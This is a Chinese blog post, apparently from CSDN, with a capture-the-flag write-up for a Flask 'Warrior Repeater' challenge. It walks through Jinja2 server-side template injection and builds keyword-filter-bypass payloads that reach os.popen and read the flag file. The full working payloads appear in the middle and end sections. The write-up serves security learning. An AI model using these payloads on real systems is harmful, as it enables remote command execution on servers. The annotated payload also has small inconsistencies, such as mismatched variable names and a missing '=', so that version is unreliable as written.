HIT-CTF-Warrior Repeater

已于 2023-12-20 10:54:25 修改
阅读量52 收藏 1
点赞数 2
分类专栏: CTF刷题 文章标签: 安全 web安全
于 2023-11-28 15:44:16 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_62170186/article/details/134665595
版权
文章讲述了如何通过Wappalyzer识别一个基于Flask的Web应用可能存在的SSTI漏洞,并逐步通过字符串注入测试,发现了一些字符串被过滤,最后成功利用attr和__getitem__函数获取敏感信息的过程。
摘要由CSDN通过智能技术生成

        首先打开网页,界面如下图所示:

449e12d45faa4c9084b2eab2e14acbf5.png

        使用Wappalyzer查看,查看网页的架构:

c09bb3a782e747e9a8bd005be28af74f.png

        可以发现是一个flask框架的web网页,猜测存在SSTI漏洞。尝试一些简单的注入,检测是否符合猜想:

输入:{{1*7}}

输出:风林火山之飞影必杀术,你已经触犯了银河正义法中不可饶恕之使用‘{{}}罪’我飞影铠甲宣布剥夺你的一切权利并对你进行封印缉捕,束手就擒吧!旋风伏魔腿,幻影刀法,飞影疾影箭。

        可以判断出,确实可能存在漏洞,并且后台将{{}}等类似的字符串过滤了;尝试其他字符串注入:

输入:{% set a = 0 %}{% print a%}

输出:你说的是:0

        以上测试,可以说明存在漏洞,且{%%}和print函数没有被ban

        使用下方代码进行注入攻击:

{%for i in ''.__class__.__base__.__subclasses__()%}{%if i.__name__ =='_wrap_close'%}{%print i.__init__.__globals__['popen']('cat flag').read()%}{%endif%}{%endfor%}

        返回数据如下:

你说的是:天地无极之刑天必杀术,你已经触犯了银河正义法中不可饶恕之‘使用违法字符串罪’,我刑天铠甲宣布剥夺你的一切权利并对你进行封印缉捕,束手就擒吧!乾坤收魔掌,火光剑法,刑天光爆弹。

        可以发现,代码中一些字符串被ban了。

        接下来,通过不断地注入猜测被ban的字符串有哪些:【以下注入返回结果均为:”你说的是:天地无极之刑天必杀术,你已经触犯了银河正义法中不可饶恕之‘使用违法字符串罪’,我刑天铠甲宣布剥夺你的一切权利并对你进行封印缉捕,束手就擒吧!乾坤收魔掌,火光剑法,刑天光爆弹。“】

{% print " %}
{% print . %}
{% print _ %}
{% print  \ %}
{% print  ' %}

        通过测试可知,以上的字符均不可使用;

        因为.被ban了,所以,如果想要使用.调用函数,需要使用attr函数进行转化:

{% print attr %}

        输出如下:

你说的是:

        可以发现,attr函数没有被ban,所以使用以下代码获取_字符:

{% set pop=dict(po=a,p=a)|join%}
{% set a=(()|select|string|list|attr(pop)(24)) %}
{% print(a) %}

        输出如下:

你说的是: _

        可以发现,可以正常输出_,说明我们获取到了_;接下来,我们尝试获取等函数:

{% set pop=dict(po=a,p=a)|join%}
{% set a=(()|select|string|list|attr(pop)(24)) %} 
{% print (a, a, dict(init=1)|join, a, a) %}

        返回数据如下:

你说的是:天地无极之刑天必杀术,你已经触犯了银河正义法中不可饶恕之‘使用违法字符串罪’,我刑天铠甲宣布剥夺你的一切权利并对你进行封印缉捕,束手就擒吧!乾坤收魔掌,火光剑法,刑天光爆弹

        推测,init字符串被ban了,使用字符串拼接技术,仿照

{{"".__class__.__bases__[0]. __subclasses__()[139].__init__.__globals__['popen']('cat flag').read()}}

        修改代码:

{% set po=dict(po=a,p=a)|join%}
{% set a=(()|select|string|list|attr(po)(24)) %} 
{% set c = (a, a, dict(cla=1, ss=1)|join, a, a)|join %}
{% set b = (a, a, dict(ba=1, se=1)|join, a, a)|join %}
{% set s = (a, a, dict(sub=1, cla=1, sses=1)|join, a, a)|join %}
{% print a|attr(c)|attr(b)|attr(s)()[0] %}

        返回结果:

你说的是:天地无极之刑天必杀术, 你已经触犯了银河正义法中不可饶恕之‘使用违法字符串罪’, 我刑天铠甲宣布剥夺你的一切权利并对你进行封印缉捕,束手就擒吧! 乾坤收魔掌,火光剑法,刑天光爆弹。

        推测[]也被ban了。所以使用__getitem__替代:

{% set po=dict(po=a,p=a)|join%}
{% set a=(()|select|string|list|attr(po)(24)) %} 
{% set bl = (()|select|string|list|attr(po)(10)) %} 
{% set c = ((a, a, dict(cla=1, ss=1)|join, a, a)|join) %}
{% set b = ((a, a, dict(ba=1, se=1)|join, a, a)|join) %}
{% set s = ((a, a, dict(sub=1, cla=1, sses=1)|join, a, a)|join) %}
{% set g = ((a, a, dict(get=1, it=1, em=1)|join, a, a)|join) %}
{% set i = ((a, a, dict(in=1, it=1)|join, a, a)|join) %}
{% set gl = ((a, a, dict(glo=1, bals=1)|join, a, a)|join) %}
{% set p = (dict(po=1, pen=1)|join) %}
{% set ca = (((dict(ty=1, pe=1)|join), bl, (dict(fl=1, ag=1)|join))|join) %}
{% set r = (dict(re=1, ad=1)|join)%}
{% print (a|attr(b)|attr(c)|attr(b)|attr(s)()|attr(g)(139)|attr(i)|attr(gl)|attr(g)(p)(ca)|attr(r)()) %}

        返回结果:

你说的是: <class 'os._wrap_close'>

        成功了一大步,接下来接着仿照下面代码修改我们的代码:

{{"".__class__.__bases__[0]. __subclasses__()[139].__init__.__globals__['popen']('cat flag').read()}}
{% set po=dict(po=a,p=a)|join%}
{% set a=(()|select|string|list|attr(po)(24)) %} 
{% set bl = (()|select|string|list|attr(po)(10)) %} 
{% set c = ((a, a, dict(cla=1, ss=1)|join, a, a)|join) %}
{% set b = ((a, a, dict(ba=1, se=1)|join, a, a)|join) %}
{% set s = ((a, a, dict(sub=1, cla=1, sses=1)|join, a, a)|join) %}
{% set g = ((a, a, dict(get=1, it=1, em=1)|join, a, a)|join) %}
{% set i = ((a, a, dict(in=1, it=1)|join, a, a)|join) %}
{% set gl = ((a, a, dict(glo=1, bals=1)|join, a, a)|join) %}
{% set p = (dict(po=1, pen=1)|join) %}
{% set ca = (((dict(ty=1, pe=1)|join), bl, (dict(fl=1, ag=1)|join))|join) %}
"""
注意,如果type无法显示,应该修改成:
{% set ca = (((dict(ca=1, t=1)|join), bl, (dict(fl=1, ag=1)|join))|join) %}
"""
{% set r = (dict(re=1, ad=1)|join)%}
{% print (a|attr(b)|attr(c)|attr(b)|attr(s)()|attr(g)(139)|attr(i)|attr(gl)|attr(g)(p)(ca)|attr(r)()) %}

        获得结果:

你说的是: flag{HIT-Armor-Warrior-YYDS}

        成功!!!

        代码注释如下:

{% set po=dict(po=a,p=a)|join%}  # po="pop"
{% set a=(()|select|string|list|attr(pop)(24)) %}  # a = "_"
{% set bl (()|select|string|list|attr(pop)(10)) %}  # bl = " "
{% set c = ((a, a, dict(cla=1, ss=1)|join, a, a)|join) %}  # c = "__class__"
{% set b = ((a, a, dict(ba=1, se=1)|join, a, a)|join) %}  # b = "__base__"
{% set s = ((a, a, dict(sub=1, cla=1, sses=1)|join, a, a)|join) %}  # s = "__subclasses__"
{% set g = ((a, a, dict(get=1, it=1, em=1)|join, a, a)|join) %}  # g = "__getitem__"
{% set i = ((a, a, dict(in=1, it=1)|join, a, a)|join) %}  # i = "__init__"
{% set gl = ((a, a, dict(glo=1, bals=1)|join, a, a)|join) %}  # gl = "__globals__"
{% set p = (dict(po=1, pen=1)|join) %}  # p = "popen"
{% set ca = ((dict(ty=1, pe=1)|join), bl, (dict(fl=1, ag=1)|join)|join)%}  # ca = "type flag"
{% set r = (dict(re=1, ad=1)|join)%}  # r = "read"
{% print (a|attr(c)|attr(b)|attr(s)()|attr(g)(139)|attr(i)|attr(gl)|attr(g)(p)(ca)|attr(r)()) %}  # print "_".__class__.__base__.__subclasses__()[139].__init__.__globals__["popen"]("cat flag").read()

        推荐阅读:FLask SSTI从零到入门 - 跳跳糖

URL = "https://tttang.com/archive/1698/#toc__10"

 

·+·+·
关注
专栏目录
juice-shop-ctf:OWASP Juice Shop的标志捕获(CTF)环境设置工具
04-30
juice-shop-ctf-cli支持以下开源CTF框架: 特遣部队 基金会 根盒子 设置 npm install -g juice-shop-ctf-cli 用法 互动模式 打开命令行并运行: juice-shop-ctf 然后按照交互式命令行工具的说明进行操作。 ...
google-ctf:Google CTF
02-04
Google CTF 该存储库列出了2017-2019 Google CTF中使用的大多数挑战以及可用于运行这些挑战的大多数基础结构。 重要信息-2017、2018、2019和2020文件夹中的代码具有未修复的安全漏洞。 这些是故意存在的,并且在...
InfoSecWarrior CTF 2020: 01
m0_61101264的博客
09-27 77
总的来说这个靶场不难。中规中矩的从web进行命令执行漏洞,从SSH服务进入靶机,提权也很简单。
Secure Code Warrlor学习记录(四)
qq_44029310的博客
05-31 792
Secure Code Warrlor是一个代码审计的练习平台,本次练习对象包含Spring框架和Spring Data Jpa框架。
Secure Code Warrlor学习记录(二)
qq_44029310的博客
05-29 1238
Secure Code Warrlor是一个代码审计的练习平台。
【Vulnhub】之JIS-CTF-VulnUpload-CTF01
zg_111的博客
03-28 1931
此靶机一共找到了5个flag,分别通过端口扫描、网站目录扫描得到账密成功登录网站,并通过发现文件上传漏洞,利用一句话木马传到靶机,再通过蚁剑进行连接,最后查找并登录technawi用户查看隐藏文件flag.txt得到全部flag。
JIS-CTF-VulnUpload-CTF01靶机渗透测试
weixin_52971422的博客
04-11 3631
靶机名:JIS-CTF-VulnUpload-CTF01 攻击机:kali 任务寻找5个flag 靶机信息扫描 Nmap -sV -A -p- ip 信息收集 发现有Robots协议 上网页 成功拿到第一个flag 上到/admin_area发现了第二个flag和网页用户 上到/login.php登录 登录上去后发现有个文件上传 直接上传一个shell.php上去看看 好像成功上传上去了,在前面robots.txt里有uploaded_files的
Vulnhub靶机-JIS-CTF-VulnUpload-CTF01学习
weixin_48800344的博客
03-10 4793
利用-sP 扫描到靶机 靶机ip 192.168.147.178 存在22 80 端口 通过nikto 和 dirb 两个工具对该网站进行扫描获取信息 获得 admin 账号和密码
OSCP - JIS-CTF-VulnUpload-CTF01 的破解
kevinhanser
04-13 3687
本文主要记录对 JIS-CTF-VulnUpload-CTF01 的渗透学习过程,测试的 VM 主机主要来源 www.vulnhub.com 博客集:面向 CTF 的 VM 破解系列 下载链接:JIS-CTF-VulnUpload-CTF01 VM - JIS-CTF-VulnUpload-CTF01 的破解 2019年4月13日19:19:03 【原创】 1. 官方描述 VM Name: ...
[CFI-CTF 2018]Automated Reversing [FlareOn1]Shellolololol [CFI-CTF 2018]powerPacked
寻梦&之璐
06-19 3531
文章目录第一次awd(和985的大佬对干)总结[CFI-CTF 2018]Automated Reversing[FlareOn1]Shellolololol(SMC)第一次异或第二次异或第三次异或第四次异或总结[CFI-CTF 2018]powerPacked脚本 第一次awd(和985的大佬对干) 总结 我们队没pwn手,两个re直接毫无战斗力,被人按在地上摩擦,今天有个题连题都没看到,然后数据库就被别人打崩了(重置机会用完了 文章目录第一次awd(和985的大佬对干)总结[CFI-CTF 2018
CG-CTF-Web-伪装者
1stPeak's Blog
07-01 1690
伪装者 1.题目 2.点击查看题目 源码没有查看到有价值的东西,根据题目名,我们猜测可能需要x-forwarded-for或client-ip,这里我们就添加一个client-ip,得到flag ...
BUUCTF [GUET-CTF2019]zips
../../../../../../../
09-29 1766
解开压缩包 需要输入密码,使用ARCHPR爆破,密码为:723456 发现111.zip伪加密,利用wireshark修改数据 将9改为偶数,修复好解压得到 查看setup.sh 运行这段python代码 print(__import__('time').time()) flag.zip为掩码爆破,利用ARCHPR设置掩码160137???.?? 掩码符号为**?** 然后解压flag.zip即可 ...
CTF-misc工具2-CTF-Tools-masterV1.3.7
08-17
CTF-Tools-master是一个专注于密码编码识别与解码的工具,能自动推断密码的编码类型,并进行解码。 适用人群: 该工具主要适用于参加CTF竞赛的选手,以及对密码编码算法感兴趣的信息安全从业人员。 使用场景: 在CTF竞赛...
awesome-ctf-cheatsheet:CTF备忘单
02-02
awesome-ctf-cheatsheet:CTF备忘单
SQLi-CTF-master.zip
04-09
CTF(Capture The Flag)是一种网络安全竞赛,参赛者通过解决各种安全挑战来获取积分,而SQLi-CTF通常是指在CTF比赛中涉及SQL注入的特定类型挑战。 在SQL注入攻击中,攻击者可以向应用程序输入恶意的SQL代码,以...
【浪潮商城-注册安全分析报告-无验证方式导致安全隐患】
weixin_46641057的博客
11-09 1085
浪潮集团是中国领先的云计算、大数据服务商,拥有浪潮信息、浪潮软件、浪潮数字企业三家上市公司。主要业务涉及计算装备、软件、云计算服务、新一代通信、大数据及若干应用场景。已为全球一百二十多个国家和地区提供IT产品和服务。作为国内做电脑硬件起家发展为综合型大型科技企业,拥有雄厚的技术实力,但好像对短信被盗刷的安全方面不够重视 ,测试结果就是随便你怎么攻击都可以,这也有点太开放了, 短信验证码难道不要钱吗?这对黑客来说肯定是好消息, 弄个简单的脚本就可以搞定。
PHP常用的安全函数作用
sheji888的专栏
11-06 524
这些函数和方法有助于提升PHP应用的安全性,但安全是一个综合性的问题,需要综合使用多种手段,如输入验证、输出编码、会话管理、错误处理等。在PHP开发中,安全是非常重要的一个方面。
【销帮帮-注册_登录安全分析报告-试用页面存在安全隐患】
weixin_46641057的博客
11-09 668
杭州逍邦网络科技有限公司成立于2015年,是国内一线CRM品牌和企服领域知名品牌。致力为客户提供专业的客户全生命周期管理和数字化销售管理服务,助力企业提升业绩,让企业更成功。销帮帮拥有强大而灵活的“PaaS+低代码”能力。在吸取了同行滑动验证码的经验后,自己研发了独特风格的那个验证码, 从逆向代码来看, 不仅借鉴了同行的技术原理,还在防抓取上下了功夫,防模拟器鼠标,物理鼠标和逻辑鼠标定位不一致判断措施,解决思路为让JS 这部分代码失效或这采用 物理定位鼠标的部分,目前采用的是物理鼠标的方式。
【AliCloud】ack + ack-secret-manager + kms 敏感数据安全存储
最新发布
StrayCat的博客
11-09 762
ack-secret-manager支持以Kubernetes Secret实例的形式向集群导入或同步KMS凭据信息,确保您集群内的应用能够安全地访问敏感信息。通过该组件,您可以实现密钥数据的自动更新,使应用负载通过文件系统挂载指定Secret实例来使用凭据信息,同时帮助您解决负载应用和阿里云凭据管家交互的兼容性问题。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值